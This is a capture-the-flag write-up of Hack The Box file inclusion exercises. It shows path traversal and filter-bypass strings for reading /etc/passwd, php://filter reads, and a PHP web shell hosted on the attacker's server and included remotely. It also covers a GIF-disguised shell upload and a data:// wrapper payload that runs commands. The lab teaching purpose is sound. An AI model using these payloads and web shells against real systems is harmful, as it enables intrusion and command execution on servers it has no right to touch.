Solving File Inclusion CTF Challenges — A Step-by-Step Guide
Introduction
Capture The Flag (CTF) challenges are popular among cybersecurity enthusiasts, as they offer exciting opportunities to test and improve their skills in various security-related areas. In this article, we will explore different techniques to solve File Inclusion challenges from the “HTB” platform. We will walk through each step, explaining the thought process and actions taken to achieve the objectives.
File Inclusion Challenge 1: Finding a User’s Name
The first challenge involves using File Inclusion to find the name of a user on the system that starts with the letter “b.”
- Change the site language to another one and inspect the URL for potential vulnerabilities.
- Craft a URL to include the ‘
/etc/passwd’ file and observe the changes in the web page.
- Try a relative path traversal technique (e.g., ‘
../../../etc/passwd’) to reveal the user’s names.
- After finding the desired user, submit the contents of the flag.txt file located in ‘
/usr/share/flags’.
File Inclusion Challenge 2: Bypassing Filters
The second challenge involves bypassing filters set up to prevent LFI exploitation:
- Attempt to access ‘/etc/passwd’ directly and note the ‘Illegal path specified!’ error.
- Employ a technique like ‘
languages/….//….//….//….//etc/passwd’ to bypass the filter.
- Use the same technique to access ‘
/flag.txt’ and retrieve the flag.
Note: If the target web application did not allow . and / in our input, we can URL encode” ../” into “%2e%2e%2f”, which may bypass the filter.
File Inclusion Challenge 3: Gaining RCE
The third challenge is about gaining Remote Code Execution (RCE) using PHP wrappers:
- Attempt to read the ‘config’ file using the ‘
php://filter/read=convert.base64-encode/resource=config’ method.
- Use ‘
php://filter/read=convert.base64-encode/resource=configure’ to find the flag in base64-encrypted form. - Decrypt the flag to obtain the final answer.
File Inclusion Challenge 4: Exploiting RFI Vulnerability
The fourth challenge involves exploiting a Remote File Inclusion (RFI) vulnerability:
echo '<?php system($_GET["cmd"]); ?>' >shell.php
cat shell.php
<?php system($_GET["cmd"]); ?> - Create a PHP file (‘
shell.php’) with a simple command execution payload.
sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...- Start an HTTP server to host the malicious PHP file.
- As you see that’s “
/index.php?language=http://10.10.14.224/shell.php&cmd=ls” command worked.
- Use this code “
/index.php?language=http://10.10.14.224/shell.php&cmd=ls+/" and see the all directories, we found the exercise folder.
/index.php?language=http://10.10.14.224/shell.php&cmd=ls+/exercise- As you see flag.txt inside of the exercise folder.
- Use this command and get the flag;
/index.php?language=http://10.10.14.224/shell.php&cmd=cat+/exercise/flag.txtFile Inclusion Challenge 5: Uploading Malicious File
The fifth challenge revolves around uploading a malicious file to gain access:
echo 'GIF8<?php system($_GET["cmd"]); ?>' >shell.gif
cat shell.gif
GIF8<?php system($_GET["cmd"]); ?>- Create a GIF file (‘
shell.gif’) with a PHP command execution payload.
- Upload the malicious file to the web application.
<img src='/profile_images/shell.gif'- Find the directory where the file is stored by inspecting the web source.
That code work;
<http://94.237.56.76:44464/index.php?language=./profile_images/shell.gif>
Look the root directory;
/index.php?language=./profile_images/shell.gif&cmd=ls+/
- Use the uploaded file to execute commands and locate the flag.
http://94.237.56.76:44464/index.php?language=./profile_images/shell.gif&cmd=cat+/2f40d853e2d4768d87da1c81772bae0a.txtFile Inclusion Challenge 6: Reading PHP.ini for Apache
The final challenge is to locate the full path to the ‘php.ini’ file for Apache:
- SSH to the target machine using the provided credentials.
- Find the ‘
php.ini’ path using ‘php -i|grep php.ini’ and observe the ‘Loaded Configuration File’ line.
- Access the ‘
php.ini’ file at ‘/etc/php/7.4/apache2/php.ini’.
- Block ‘
system()’ in ‘php.ini’ and try executing PHP code that uses ‘system()’.
<?php system($_GET["cmd"]); ?>
PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D #base64 then URLdata://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls
- Read the ‘
/var/log/apache2/error.log’ file to identify the reason for blocking ‘system()’ (fill in the blank).
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat+/37809e2f8952f06139011994726d9ef1.txtConclusion
File Inclusion challenges can be both intriguing and instructive when it comes to learning about security vulnerabilities and exploiting them. By following the detailed steps provided in this article, you can gain practical experience in using File Inclusion techniques and strengthen your cybersecurity skills. Always remember to perform CTF challenges responsibly and ethically, adhering to the platform’s rules and guidelines. Happy hacking!
